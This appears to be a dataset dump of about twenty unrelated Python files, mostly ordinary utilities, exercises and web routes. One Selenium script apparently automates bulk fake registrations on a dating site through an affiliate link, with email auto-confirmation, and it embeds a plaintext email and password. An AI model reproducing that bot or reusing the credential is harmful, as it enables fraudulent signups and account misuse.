text
stringlengths 8
6.05M
|
|---|
#!/usr/bin/env python
'''
## Course Project
##
'''
import graph_properties as gp
from pylab import *
import networkx as nx
# --------------------------------------------
# Base code
# --------------------------------------------
def get_unique_fn(path):
    """Return a unique file name of the form <path>graph<timestamp>.

    The timestamp (YYYYmmdd_HHMMSS) makes names unique per second.
    Fix: the original used a Python 2 print statement, a syntax error
    under Python 3 (the rest of the file uses print() calls).
    """
    import time
    timestr = time.strftime("%Y%m%d_%H%M%S")
    filename = path + 'graph' + timestr
    print(filename)
    return filename
def print_graph(graph):
    """Print the graph's per-node properties as CSV to stdout.

    The first line is a header of all property names from
    graph_properties; each following line is "<node>,<prop1>,<prop2>,...".
    NOTE(review): uses the pre-2.0 networkx API (nodes_iter, graph.node)
    — confirm the pinned networkx version.
    """
    # header row
    output = ', '.join(gp.get_all_property_names())
    print(output)
    for x in graph.nodes_iter():
        output = str(x)
        for y in gp.get_all_property_names():
            output = output + "," + str(graph.node[x][y])
        print(output)
def save_graph(graph, pathname):
    """Write *graph* in GML format under a unique, timestamped file name."""
    target = get_unique_fn(pathname)
    nx.write_gml(graph, target + '.gml')
def save_graphml(g, fname):
    """Write graph *g* in GraphML format under a unique, timestamped file name."""
    target = get_unique_fn(fname)
    nx.write_graphml(g, target + '.graphml')
def save_csv(d, fname):
    """Write the per-node properties of graph *d* to a unique CSV file.

    Fixes in this revision: the original opened `fname` with an undefined
    name `w`, iterated an undefined `graph` instead of the parameter `d`,
    and wrote through the file-*name* string `fn` instead of a handle.
    """
    fn = get_unique_fn(fname)
    header = ', '.join(gp.get_all_property_names())
    print(header)
    with open(fn + '.csv', 'w') as f:
        f.write(header + '\n')
        for x in d.nodes_iter():
            row = str(x)
            for y in gp.get_all_property_names():
                row = row + "," + str(d.node[x][y])
            print(row)
            f.write(row + '\n')
def read_gml(fname):
    """Read a graph from *fname* and return it.

    Fix: Python 2 print statement converted to a print() call.
    NOTE(review): despite the name this reads GraphML (matching what
    save_graphml writes) — confirm which format callers expect.
    """
    print("reading ", fname)
    return nx.read_graphml(fname)
def read_csv(fname):
    """Read a graph from a CSV file (not yet implemented).

    The original body (`return nx.read`) referenced a non-existent
    networkx attribute and raised AttributeError on every call; fail
    explicitly until a real CSV reader is written (see save_csv for
    the on-disk format).
    """
    raise NotImplementedError("read_csv is not implemented")
|
class Event:
    """A speaking event with a minimum required experience level."""

    def __init__(self, name, required_experience):
        self.name = name                                # event title
        self.required_experience = required_experience  # minimum speaker level (int)

    def print(self):
        """Print a one-line summary of the event.

        Fix: the original concatenated a str with the int
        required_experience, raising TypeError on every call.
        """
        print(self.name + " requires " + str(self.required_experience))
class InterdisciplinaryEvent:
    """Wraps a base event: 'Interdisciplinary ' name prefix, +2 required experience."""

    def __init__(self, base_event):
        prefix = "Interdisciplinary "
        self.name = prefix + base_event.name
        self.required_experience = 2 + base_event.required_experience
class InternationalEvent:
    """Wraps a base event: 'International ' name prefix, +4 required experience."""

    def __init__(self, base_event):
        prefix = "International "
        self.name = prefix + base_event.name
        self.required_experience = 4 + base_event.required_experience
class Speaker:
    """A speaker who accumulates experience by speaking at events."""

    def __init__(self, name, experience):
        self.name = name
        self.experience = experience  # current experience level (int)
        self.events = []              # events successfully spoken at

    def speak(self, event):
        """Speak at *event* if experienced enough, gaining its required experience."""
        if event.required_experience > self.experience:
            print(self.name + " does not have enough experience to speak at " + event.name)
        else:
            print(self.name + " is speaking at the " + event.name)
            self.experience += event.required_experience
            self.events.append(event)

    def print_status(self):
        """Print the events spoken at and the current experience level.

        Fix: the original printed e.g. "spoke at3 events" (missing space);
        stray semicolons removed.
        """
        print(self.name + " spoke at " + str(len(self.events)) + " events: ")
        for event in self.events:
            print(" * " + event.name)
        print("this speaker has " + str(self.experience) + " level of experience")
# Demo: build a few events (plain, interdisciplinary, international)
# and walk one speaker through them in order.
dina = Speaker('Dina', 1)
meetup = Event('Meetup', 2)
party = Event('Party', 1)
conference = Event("Conference", 5)

interdisciplinary_meetup = InterdisciplinaryEvent(meetup)
international_interdisciplinary_meetup = InternationalEvent(interdisciplinary_meetup)
international_conference = InternationalEvent(conference)

for booking in (party, meetup, conference, interdisciplinary_meetup):
    dina.speak(booking)
dina.print_status()
|
from pathlib import Path
class Site:
    """Mirrors a source directory tree into a destination directory,
    running a matching parser on each file.

    Fixes in this revision: load_parser and parse were called as bare
    names (NameError at runtime) and load_parser ignored the extension
    it was given. Parsers are now asked via valid_extension(extension)
    and invoked via parser.parse(...) — TODO confirm this matches the
    parser classes' actual interface.
    """

    def __init__(self, source, dest, parsers=None):
        self.source = Path(source)
        self.dest = Path(dest)
        self.parsers = parsers or []

    def create_dir(self, path):
        """Create the destination mirror of source directory *path*."""
        directory = self.dest / path.relative_to(self.source)
        directory.mkdir(parents=True, exist_ok=True)

    def load_parser(self, extension):
        """Return the first parser accepting *extension*, else None."""
        for parser in self.parsers:
            if parser.valid_extension(extension):
                return parser

    def run_parser(self, path):
        """Parse one source file with a matching parser, if any."""
        parser = self.load_parser(path.suffix)
        if parser is not None:
            parser.parse(path, self.source, self.dest)
        else:
            print("Not Implemented!!")

    def build(self):
        """Create the destination root, then walk and mirror the source tree."""
        self.dest.mkdir(parents=True, exist_ok=True)
        for path in self.source.rglob("*"):
            if path.is_dir():
                self.create_dir(path)
            elif path.is_file():
                self.run_parser(path)
|
class Solution(object):
    """Three variants of LeetCode 35, Search Insert Position."""

    def search_insert(self, nums, target):
        """
        Naive O(n) scan. 40 ms
        :type nums: List[int]
        :type target: int
        :rtype: int
        """
        for i, num in enumerate(nums):
            if num == target:
                return i
            # target is absent but belongs before this element
            if num > target:
                return i
        # target is greater than every element (or nums is empty)
        return len(nums)

    def search_insertion_v2(self, nums, target):
        """
        Hand-rolled binary search with explicit edge handling. 36 ms
        """
        if not nums or nums[0] == target:
            return 0
        left = 0
        right = len(nums) - 1
        # at the beginning
        if target < nums[left]:
            return left
        # or at the end of the list
        if target > nums[right]:
            return right + 1
        # then we know the target should be inserted somewhere in the middle
        while left < right:
            middle = (left + right) // 2
            if target == nums[middle]:
                return middle
            if target > nums[middle]:
                left = middle + 1
                if target <= nums[left]:
                    return left
            else:
                right = middle - 1
                if target == nums[right]:
                    return right
                elif target > nums[right]:
                    return right + 1

    def search_insertion_v3(self, nums, target):
        """
        Classic binary search; `left` lands on the insertion index. 24 ms
        NOTE: assumes nums contains no duplicates.
        Fix: removed a leftover per-iteration debug print.
        """
        if not nums:
            return 0
        left = 0
        right = len(nums) - 1
        while left <= right:
            mid = (left + right) // 2
            if target == nums[mid]:
                return mid
            if target < nums[mid]:
                right = mid - 1
            else:
                left = mid + 1
        return left
# Smoke test: 8 is greater than every element, so the insertion index
# is len(nums) == 4.
nums = [1, 3, 5, 7]
target = 8
obj = Solution()
result = obj.search_insertion_v3(nums, target)
print(f"result: {result}, target: {target}")
|
from office365.runtime.queries.delete_entity_query import DeleteEntityQuery
from office365.runtime.queries.service_operation_query import ServiceOperationQuery
from office365.runtime.resource_path import ResourcePath
from office365.runtime.resource_path_service_operation import ResourcePathServiceOperation
from office365.sharepoint.base_entity import BaseEntity
from office365.sharepoint.principal.user import User
class RecycleBinItem(BaseEntity):
    """A single item in a SharePoint Recycle Bin."""

    def delete_object(self):
        """Permanently deletes the Recycle Bin item."""
        qry = DeleteEntityQuery(self)
        self.context.add_query(qry)
        self.remove_from_parent_collection()
        return self  # fluent: queued until context.execute_query()

    def restore(self):
        """Restores the Recycle Bin item to its original location."""
        qry = ServiceOperationQuery(self, "Restore")
        self.context.add_query(qry)
        return self

    def move_to_second_stage(self):
        """Queues a server-side "MoveToSecondStage" operation for this item."""
        qry = ServiceOperationQuery(self, "MoveToSecondStage")
        self.context.add_query(qry)
        return self

    @property
    def id(self):
        """Gets a value that specifies the identifier of the Recycle Bin item."""
        return self.properties.get('Id', None)

    @property
    def deleted_by(self):
        """Gets a value that specifies the user who deleted the Recycle Bin item."""
        # default is a lazily-resolved User bound to the DeletedBy sub-path
        return self.properties.get('DeletedBy', User(self.context, ResourcePath("DeletedBy", self.resource_path)))

    @property
    def deleted_date(self):
        """Gets a value that specifies when the Recycle Bin item was moved to the Recycle Bin."""
        return self.properties.get('DeletedDate', None)

    def set_property(self, name, value, persist_changes=True):
        """Sets a property value; once the server-assigned Id arrives,
        derives this item's resource path from its parent collection."""
        super(RecycleBinItem, self).set_property(name, value, persist_changes)
        # fallback: create a new resource path
        if self._resource_path is None:
            if name == "Id" and self._parent_collection is not None:
                self._resource_path = ResourcePathServiceOperation(
                    "GetById", [value], self._parent_collection.resource_path)
|
# Demo of the imgpr lazy-graph API (TensorFlow-style sessions).
import imgpr as ip
image = ip.image.openImage("example.png")
# placeholder shaped like the image's height/width (channels dropped)
x = ip.placeholder(shape=image.shape[:2])
# NOTE(review): warps the image onto a 400x400 sphere; fix_color
# presumably fills out-of-range pixels — confirm against imgpr docs.
y = ip.layers.warping(x, (400, 400), ip.warp.sphere, fix_color=(200, 200, 200))
with ip.Session() as sess:
    output = sess.run(y, feed_dict={x : image})
# show original and warped images side by side
ip.image.showImages([[image, output]])
|
from sys import argv

# read the WYSS section for how to run this
script, first, second, third = argv

for label, value in (
    ("the script is called:", script),
    ("your first variable is:", first),
    ("the second variable is:", second),
    ("the third variable is:", third),
):
    print(label, value)

# rebind the three variables interactively
first = input("please give first variable:")
second = input("please give second variable:")
third = input("please give third variable:")
|
# Collect apartment sale transaction data from the Korean Ministry of
# Land, Infrastructure and Transport (MOLIT) open API. Fields collected:
# - region code
# - legal district (beopjeong-dong)
# - transaction date
# - apartment name
# - lot number
# - exclusive floor area
# - floor
# - construction year
# - transaction price
import PublicDataReader as pdr
# Open API service key
serviceKey = "OPEN API SERVICE KEY HERE"
# Create a MOLIT real-transaction-price Open API client
molit = pdr.Transaction(serviceKey)
# Look up the region code by district name
bdongName = '분당구'
codeResult = molit.CodeFinder(bdongName)
codeResult.head(1)
# Apartment sale transactions for one month (region 41135, 2020-04)
df = molit.AptTrade(41135, 202004)
# Apartment sale transactions over a period (2020-01 .. 2020-03)
df_sum = molit.DataCollector(molit.AptTrade, 41135, 202001, 202003)
|
# Sum of the 20-term series 1/1 + 3/2 + 5/4 + ... + 39/2**19
# (odd numerators, denominators doubling each term).
s, c, x = 0, 1, 1
for _ in range(20):
    s += c / x
    c, x = c + 2, x * 2
print('{:.2f}'.format(s))
|
from django.shortcuts import render
def main(request):
    """Render the landing page."""
    return render(request,"main.html")
def analyze(request):
    """Render the analysis page, exposing the uploaded files to the template."""
    context = {"output": request.FILES}
    return render(request, "analyze.html", context)
|
"""
using MSIS Fortran executable from Python
"""
from __future__ import annotations
from pathlib import Path
import subprocess
import logging
import typing as T
import shutil
import numpy as np
import h5py
import xarray
from . import cmake
def msis_setup(p: dict[str, T.Any], xg: dict[str, T.Any]) -> xarray.Dataset:
    """
    calls MSIS Fortran executable msis_setup--builds if not present

    [f107a, f107, ap] = activ

    Writes an HDF5 input file describing the grid and solar indices,
    runs the external msis_setup program, then loads its HDF5 output
    into an xarray.Dataset of neutral densities and temperature on
    (alt_km, glat, glon) coordinates.
    """
    name = "msis_setup"
    src_dir = cmake.get_gemini_root()
    # look for the built executable in the usual CMake output dirs
    # (set iteration order is arbitrary; any hit is acceptable)
    for n in {"build", "build/Debug", "build/Release"}:
        msis_exe = shutil.which(name, path=str(src_dir / n))
        if msis_exe:
            break
    if not msis_exe:
        raise EnvironmentError(
            "Did not find gemini3d/build/msis_setup--build by:\n"
            "gemini3d.cmake.build_gemini3d('msis_setup')\n"
        )
    # fresh array: clamping below does not mutate xg["alt"]
    alt_km = xg["alt"] / 1e3
    # % CONVERT DATES/TIMES/INDICES INTO MSIS-FRIENDLY FORMAT
    t0 = p["time"][0]
    doy = int(t0.strftime("%j"))  # day of year
    UTsec0 = t0.hour * 3600 + t0.minute * 60 + t0.second + t0.microsecond / 1e6
    # censor BELOW-ZERO ALTITUDES SO THAT THEY DON'T GIVE INF
    alt_km[alt_km <= 0] = 1
    # %% CREATE INPUT FILE FOR FORTRAN PROGRAM
    msis_infile = p.get("msis_infile", p["indat_size"].parent / "msis_setup_in.h5")
    msis_outfile = p.get("msis_outfile", p["indat_size"].parent / "msis_setup_out.h5")
    with h5py.File(msis_infile, "w") as f:
        f.create_dataset("/doy", dtype=np.int32, data=doy)
        f.create_dataset("/UTsec", dtype=np.float32, data=UTsec0)
        f.create_dataset("/f107a", dtype=np.float32, data=p["f107a"])
        f.create_dataset("/f107", dtype=np.float32, data=p["f107"])
        # the single daily Ap index is replicated into the 7 slots MSIS expects
        f.create_dataset("/Ap", shape=(7,), dtype=np.float32, data=[p["Ap"]] * 7)
        # astype(float32) to save disk I/O time/space
        # we must give full shape to give proper rank/shape to Fortran/h5fortran
        f.create_dataset("/glat", shape=xg["lx"], dtype=np.float32, data=xg["glat"])
        f.create_dataset("/glon", shape=xg["lx"], dtype=np.float32, data=xg["glon"])
        f.create_dataset("/alt", shape=xg["lx"], dtype=np.float32, data=alt_km)
    # %% run MSIS
    args = [str(msis_infile), str(msis_outfile)]
    if "msis_version" in p:
        args.append(str(p["msis_version"]))
    cmd = [msis_exe] + args
    logging.info(" ".join(cmd))
    ret = subprocess.run(cmd, text=True, cwd=Path(msis_exe).parent)
    # return code 20 is the executable's "wrong MSIS version" signal
    if ret.returncode == 20:
        raise RuntimeError("Need to compile with 'cmake -Dmsis20=true'")
    if ret.returncode != 0:
        raise RuntimeError(
            f"MSIS failed to run: return code {ret.returncode}. See console for additional error info."
        )
    # %% load MSIS output
    # use disk coordinates for tracability
    with h5py.File(msis_outfile, "r") as f:
        # assumes rank-3 (alt, glat, glon) datasets -- TODO confirm
        alt1 = f["/alt"][:, 0, 0]
        glat1 = f["/glat"][0, :, 0]
        glon1 = f["/glon"][0, 0, :]
        atmos = xarray.Dataset(coords={"alt_km": alt1, "glat": glat1, "glon": glon1})
        for k in {"nO", "nN2", "nO2", "Tn", "nN", "nH"}:
            atmos[k] = (("alt_km", "glat", "glon"), f[f"/{k}"][:])
    # Mitra, 1968
    atmos["nNO"] = 0.4 * np.exp(-3700.0 / atmos["Tn"]) * atmos["nO2"] + 5e-7 * atmos["nO"]
    return atmos
|
import numpy as np
import gain
import math
import matplotlib.pyplot as plt
def UCB(T, J, nb_machines) :
    """Upper-Confidence-Bound bandit over *nb_machines* arms for T rounds.

    Plays each arm once, then repeatedly plays the arm with the highest
    confidence bound B[k]. Regret is measured against arm 3 (assumed
    optimal — TODO confirm) and normalised by T.
    Returns regret[1:-1] as a numpy array.
    NOTE(review): the slice drops the final regret entry — confirm this
    off-by-one is intended.
    """
    s = [0] * nb_machines  # number of times arm k has been played
    regret = [0]
    moy = [0] * nb_machines  # empirical mean payoff per arm
    B = [0] * nb_machines    # upper confidence bound per arm
    a = 0  # assume the machines' theoretical gain never goes far above 0
    # Determination of b, the smallest k such that P(X = k) < 10^-9
    #==============================================================================
    # mu = 1.5
    # b = 0
    # p = math.exp(-mu) * mu**b / math.factorial(b)
    # while p > 1e-10 :
    #     b += 1
    #     p = math.exp(-mu) * mu**b / math.factorial(b)
    #==============================================================================
    b = 15
    # initialisation: play every arm once
    for i in range(nb_machines) :
        moy[i] = gain.testGain(i+1, J)[0]
        s[i] += 1
        regret.append(regret[-1] + (-gain.testGain(i+1, J)[1] + gain.testGain(3, J)[1])/T)
    # print(moy)
    for t in range(nb_machines, T+1) :
        # recompute the confidence bound of every arm
        for k in range(nb_machines) :
            B[k] = moy[k] + (b - a) * math.sqrt(3 * np.log(1/0.95) / (2 * s[k]))
        k = np.argmax(np.asarray(B))
        print(B)
        # incremental update of the empirical mean of the chosen arm
        moy[k] = gain.testGain(k+1, J)[0]/(s[k] + 1) + (s[k]) / (s[k] + 1) * moy[k]
        s[k] += 1
        regret.append(regret[-1] + (-gain.testGain(k+1, J)[1] + gain.testGain(3, J)[1])/T)
    print(moy)
    return np.asarray(regret[1:-1])
# Run the UCB bandit for T=1000 rounds over 5 machines and plot the regret.
plt.plot(UCB(1000, 0, 5), "green")
|
'''
Flirt
'''
from selenium import webdriver
from time import sleep
# import xlrd
import random
import os
import time
import sys
sys.path.append("..")
# import email_imap as imap
# import json
import re
# from urllib import request, parse
from selenium.webdriver.support.ui import Select
# import base64
import Chrome_driver
import email_imap as imap
import name_get
import db
import selenium_funcs
import Submit_handle
import random
import emaillink
def _click_xpath(chrome_driver, xpath):
    """Click the element located by *xpath* (helper for web_submit)."""
    chrome_driver.find_element_by_xpath(xpath).click()


def _click_random_choice(chrome_driver, div_index):
    """Click one of the four answer buttons of form step *div_index* at random."""
    choice = random.randint(0, 3)
    _click_xpath(
        chrome_driver,
        '//*[@id="regform"]/div[1]/div[%d]/div/div[1]/button[%d]' % (div_index, choice + 1))


def web_submit(submit, chrome_driver, debug=0):
    """Walk the multi-step registration form at submit['Site'], create an
    account, then open the email-confirmation link in a new window.

    Returns 1 on completion, or None if no confirmation link was found.
    Refactor: the four copy-pasted "pick a random button" blocks are now
    one helper; bare excepts narrowed to Exception.
    """
    if debug == 1:
        site = 'http://zh.moneymethods.net/click.php?c=11&key=75uwb87m43ef55qo3ytehrd1'
        submit['Site'] = site
    chrome_driver.get(submit['Site'])
    chrome_driver.maximize_window()
    chrome_driver.refresh()
    sleep(5)
    # steps 1-3: fixed choices
    _click_xpath(chrome_driver, '//*[@id="regform"]/div[1]/div[1]/div/div/div/div[1]/label')
    sleep(2)
    _click_xpath(chrome_driver, '//*[@id="regform"]/div[1]/div[2]/div/div[2]/button[1]')
    sleep(2)
    _click_xpath(chrome_driver, '//*[@id="regform"]/div[1]/div[3]/div/div[1]/div/div[1]/label')
    sleep(2)
    # steps 4-5: random picks
    _click_random_choice(chrome_driver, 4)
    sleep(2)
    _click_random_choice(chrome_driver, 5)
    sleep(2)
    # step 6: random dropdown entry, then continue
    index = random.randint(0, 4)
    s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="regform"]/div[1]/div[6]/div/div[1]/div/select'))
    s1.select_by_index(index)
    sleep(2)
    _click_xpath(chrome_driver, '//*[@id="regform"]/div[1]/div[6]/div/div[2]/button[1]')
    sleep(2)
    # steps 7-8: more random picks
    _click_random_choice(chrome_driver, 7)
    sleep(2)
    _click_random_choice(chrome_driver, 8)
    sleep(10)
    _click_xpath(chrome_driver, '//*[@id="regform"]/div[1]/div[10]/div/div/button')
    sleep(5)
    # account creation
    name = name_get.gen_one_word_digit(lowercase=False)
    pwd = Submit_handle.password_get()
    try:
        _click_xpath(chrome_driver, '//*[@id="regform"]/div[1]/div[11]/div/div[2]/button')
        sleep(2)
        chrome_driver.find_element_by_xpath('//*[@id="username"]').send_keys(name)
        sleep(1)
        chrome_driver.find_element_by_xpath('//*[@id="password"]').send_keys(pwd)
        sleep(1)
        _click_xpath(chrome_driver, '//*[@id="regform"]/div[1]/div[12]/div/div[4]/button[1]')
        sleep(2)
        chrome_driver.find_element_by_xpath('//*[@id="email"]').send_keys(submit['Email']['Email_emu'])
        sleep(1)
        _click_xpath(chrome_driver, '//*[@id="regform"]/div[1]/div[13]/div/div[2]/button[1]')
        sleep(10)
    except Exception:
        # alternate page layout: username/password/email on a single step
        if chrome_driver.find_element_by_xpath('//*[@id="username"]'):
            print('==============')
            print('==============')
            chrome_driver.find_element_by_xpath('//*[@id="username"]').send_keys(name)
            sleep(1)
            chrome_driver.find_element_by_xpath('//*[@id="password"]').send_keys(pwd)
            sleep(2)
            chrome_driver.find_element_by_xpath('//*[@id="email"]').send_keys(submit['Email']['Email_emu'])
            sleep(1)
            _click_xpath(chrome_driver, '//*[@id="regform"]/div[1]/div[11]/div/div[6]/button')
            sleep(10)
    sleep(20)
    # fetch the confirmation link from the mailbox
    site = ''
    handle = chrome_driver.current_window_handle
    try:
        site = email_confirm(submit)
        print(site)
    except Exception as e:
        print('email check failed', str(e))
    if site != '':
        newwindow = 'window.open("' + site + '");'
        chrome_driver.execute_script(newwindow)
        sleep(30)
    else:
        # no link found: give up and close the browser
        chrome_driver.close()
        chrome_driver.quit()
        return
    handles = chrome_driver.window_handles
    sleep(10)
    try:
        for i in handles:
            if i != handle:
                chrome_driver.switch_to.window(i)
                try:
                    chrome_driver.refresh()
                    sleep(20)
                    try:
                        _click_xpath(chrome_driver, '//*[@id="mainContainer"]/div/section/ul[1]/li[3]/div/a')
                    except Exception:
                        pass
                except Exception:
                    pass
    except Exception:
        pass
    return 1
def email_confirm(submit):
    """Poll the mailbox for the mydates.com confirmation link.

    Tries up to 5 times; returns the extracted URL, or '' if none of
    the attempts found one.
    """
    print('----------')
    for i in range(5):
        url_link = ''
        try:
            name = submit['Email']['Email_emu']
            pwd = submit['Email']['Email_emu_pwd']
            title = ('service@ga.mydates.com','')
            # 'https://mydates.com?code=0df6c9c9-12ba-46a6-8282-7b6a4c9f2103&trk=5fzb3wd'
            pattern = r'.*?(https://mydates.com\?code=[0-9a-zA-Z]{1,10}-[0-9a-zA-Z]{1,10}-[0-9a-zA-Z]{1,10}-[0-9a-zA-Z]{1,10}-[0-9a-zA-Z]{1,20}&trk=[0-9a-zA-Z]{1,10})'
            # url_link = emaillink.get_email(name,pwd,title,pattern)
            # if 'http' in url_link :
            #     print(url_link)
            #     break
            # title = ('supportlivecam.com','')
            # pattern = r'.*?Confirm Your Email.*?(http://trk.email.supportlivecam.com/[0-9a-zA-Z]{1,30}/[0-9a-zA-Z]{1,1000})By clicking on the'
            url_link = emaillink.get_email(name,pwd,title,pattern,True)
            if 'http' in url_link :
                # NOTE(review): replace('&','&') is a no-op — this was
                # probably meant to unescape '&amp;' to '&'; confirm.
                url_link = url_link.replace('?','/?').replace('&','&')
                print(url_link)
                break
        except Exception as e:
            print(str(e))
            print('===')
            pass
    return url_link
def web_confirm():
    """Open a hard-coded confirmation URL in a fresh Chrome and click the
    confirmation element if present, then idle for five minutes."""
    url='https://mydates.com/?code=685bae42-d07c-400e-9eef-91b1627f94c1&trk=5g2959w'
    chrome_driver = Chrome_driver.get_chrome()
    chrome_driver.get(url)
    try:
        chrome_driver.find_element_by_xpath('//*[@id="mainContainer"]/div/section/ul[1]/li[3]/div/a').click()
    except:
        pass
    sleep(300)
def test():
    """Ad-hoc manual test: read one record from the Excel/db layer and
    run the web submission with it."""
    # db.email_test()
    Mission_list = ['10009']
    Excel_name = ['','Email']
    Email_list = ['hotmail.com','outlook.com','yahoo.com','aol.com','gmail.com']
    submit = db.read_one_excel(Mission_list,Excel_name,Email_list)
    # db.read_all_info()
    # print(submit)
    # excel_list = []
    # for i in range(400):
    #     submit = db.read_one_excel(Mission_list,Excel_name,Email_list)
    #     # print(submit)
    #     excel_list.append(submit['Email']['Email_Id'])
    # # print(excel_list)
    # print(len(excel_list))
    # print(len(set(excel_list)))
    # date_of_birth = Submit_handle.get_auto_birthday(submit['Uspd']['date_of_birth'])
    # print(date_of_birth)
    # NOTE(review): 1 is passed where web_submit expects a webdriver
    # instance — this call will fail; confirm intended usage.
    web_submit(submit,1)
    # print(submit['Uspd'])
    # print(submit['Uspd']['state'])
    # print(submit['Uspd']['city'])
    # print(submit['Uspd']['zip'])
    # print(submit['Uspd']['date_of_birth'])
    # print(submit['Uspd']['ssn'])
def email_test():
    """Manual test of email_confirm with a canned credentials record."""
    submit = {'Email':{'Email_Id': '6f4ff393-aa34-11e9-a4ec-0003b7e49bfc', 'Email_emu': 'SummerCopelandk@aol.com', 'Email_emu_pwd': 'reo3xzpL', 'Email_assist': '', 'Email_assist_pwd': '', 'Status': 'Good'}}
    email_confirm(submit)
if __name__=='__main__':
    # Entry point: only runs the stand-alone confirmation flow.
    web_confirm()
    print('......')
|
from django.conf.urls import patterns, include, url
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
import emart.views
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
# URL routes for the emart app.
# NOTE(review): patterns() and string view references were removed in
# Django 1.10 — this urlconf targets an old Django release.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'emart.views.home', name='home'),
    # url(r'^emart/', include('emart.foo.urls')),
    # Uncomment the admin/doc line below to enable admin documentation:
    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
    # Uncomment the next line to enable the admin:
    # url(r'^admin/', include(admin.site.urls)),
    url(r'^$',emart.views.home),
    url(r'^home/$',emart.views.home),
    url(r'^login/$',emart.views.login),
    url(r'^signup/$',emart.views.signup),
    url(r'^handle_login/$',emart.views.handle_login),
    # (\d{8}) captures an 8-digit item id passed to the view
    url(r'^detail/id/(\d{8})/$',emart.views.detail),
    url(r'^delete_item/id/(\d{8})/$',emart.views.delete_item),
    url(r'^view_commodities_by_class/(\w+)/$',emart.views.view_commodities_by_class),
    url(r'^add_to_chart/$',emart.views.add_to_chart),
    url(r'^my_chart/$',emart.views.my_chart),
    url(r'^generate_order/$',emart.views.generate_order),
    url(r'buy_now/(\d{8})/',emart.views.buy_now),
    url(r'^logout/$',emart.views.logout),
    url(r'^my_orders/$',emart.views.my_orders),
    # serve static files straight from the project dir (dev only)
    url( r'^static/(?P<path>.*)$', 'django.views.static.serve',{ 'document_root': '/home/sign/E-Mart/emart' }),
)
|
alphabet = "abcdefghijklmnopqrstuvwxyz"


def removechar(string, idx):
    """Return *string* with the character at index *idx* removed."""
    return string[:idx] + string[idx + 1:]
def removedupli(mystring):
    """Return *mystring* with duplicates removed, keeping the first
    occurrence of each character (order preserved).

    Uses dict.fromkeys for an O(n) dedupe instead of the original
    O(n^2) `ch not in newstr` scan.
    """
    return "".join(dict.fromkeys(mystring))
def removeMatches(mystring, removestring):
    """Return *mystring* minus every character present in *removestring*.

    Membership tests run against a set, avoiding the original
    O(len(mystring) * len(removestring)) scan.
    """
    remove = set(removestring)
    return "".join(ch for ch in mystring if ch not in remove)
def genekeypass(password):
    """Build a substitution key from *password*: the deduplicated password,
    then the unused letters after its last letter, then those before it."""
    key = 'abcdefghijklmnopqrstuvwxyz'
    password = removedupli(password)
    last_index = key.find(password[-1])
    tail = removeMatches(key[last_index + 1:], password)
    head = removeMatches(key[:last_index], password)
    return password + tail + head
def subsencrypt(plaintext, key1):
    """Substitution-encrypt *plaintext*: each letter maps to the character
    at its alphabet position in *key1*. Non-alphabet characters hit
    find() == -1 and therefore map to key1[-1] (as in the original)."""
    plaintext = plaintext.lower()
    return "".join(key1[alphabet.find(ch)] for ch in plaintext)
def neighbourcount(text):
    """Count, for every character of *text*, how often each alphabet
    character appears adjacent to it. Returns {char: {neighbour: count}}."""
    text = text.lower()
    counts = {}
    for left, right in zip(text, text[1:]):
        maybeAdd(right, counts.setdefault(left, {}))
        maybeAdd(left, counts.setdefault(right, {}))
    return counts
def maybeAdd(ch, todict):
    """Increment todict[ch] when *ch* is a lowercase letter; ignore others."""
    if ch in alphabet:
        todict[ch] = todict.get(ch, 0) + 1
# Prompt for a password, derive a substitution key from it, encrypt the
# text of alpha.txt, and print adjacency counts of the ciphertext.
# Fixes: raw_input and the print statement are Python 2 only; the book
# file is now closed via a context manager.
x = input("what's your password>>>")
genkey = genekeypass(x)
with open('alpha.txt') as book:
    mytext = book.read()
y = subsencrypt(mytext, genkey)
ncount = neighbourcount(y)
print(ncount)
|
"""
Copyright MIT and Harvey Mudd College
MIT License
Summer 2020
Lab 5 - AR Markers
"""
########################################################################################
# Imports
########################################################################################
import sys
import cv2 as cv
import numpy as np
sys.path.insert(0, "../../library")
import racecar_core
import racecar_utils as rc_utils
########################################################################################
# Global variables
########################################################################################
rc = racecar_core.create_racecar()  # shared car interface used by start()/update()
# Add any global variables here
########################################################################################
# Functions
########################################################################################
def start():
    """
    This function is run once every time the start button is pressed.
    It resets the car to a stopped state before update() begins firing.
    """
    # Have the car begin at a stop
    rc.drive.stop()
    # Print start message
    print(">> Lab 5 - AR Markers")
def update():
    """
    After start() is run, this function is run every frame until the back button
    is pressed
    """
    color_image = rc.camera.get_color_image()
    # markers detected in the current frame (unused until the TODOs below
    # are implemented — this is the lab skeleton)
    markers = rc_utils.get_ar_markers(color_image)
    # TODO: Turn left if we see a marker with ID 0 and right for ID 1
    # TODO: If we see a marker with ID 199, turn left if the marker faces left and right
    # if the marker faces right
    # TODO: If we see a marker with ID 2, follow the color line which matches the color
    # border surrounding the marker (either blue or red). If neither color is found but
    # we see a green line, follow that instead.
########################################################################################
# DO NOT MODIFY: Register start and update and begin execution
########################################################################################
if __name__ == "__main__":
rc.set_start_update(start, update, None)
rc.go()
|
import boto3
import json
import cv2
# Document to analyse
documentName = "7_screen.png"
# Read document content as raw bytes (the form AWS Textract expects)
with open(documentName, 'rb') as document:
    imageBytes = bytearray(document.read())
# Fix: the original cv2.imread call was truncated mid-statement (syntax
# error); load the image with the default BGR colour flag.
img = cv2.imread('messi5.jpg')
|
from flask import Flask
from rest.controllers.estudante import app as estudante_controller
from rest.controllers.disciplina import app as disciplina_controller
from rest.controllers.usuario import app as usuario_controller
from rest.models.model import db
app = Flask(__name__, template_folder='templates')
# SQLite provides a relational DBMS in a single package and can be driven
# from the command line, making ad-hoc SQL queries simple. (The app does
# not depend on that package at run time, but installing it is handy if
# you ever need to run SQL against the database directly.)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.register_blueprint(estudante_controller, url_prefix="/estudante/")
app.register_blueprint(disciplina_controller, url_prefix="/disciplina/")
app.register_blueprint(usuario_controller, url_prefix="/usuario/")
# Blueprints let a module extend the main application and behave much
# like a Flask app of its own — a big win for larger projects, since it
# keeps the code base modular, which helps organisation, development and
# maintenance of the source.
@app.route("/")
def index():
return "Index"
if __name__ == '__main__':
    # Bind the SQLAlchemy instance to the app and create any missing
    # tables before serving.
    db.init_app(app=app)
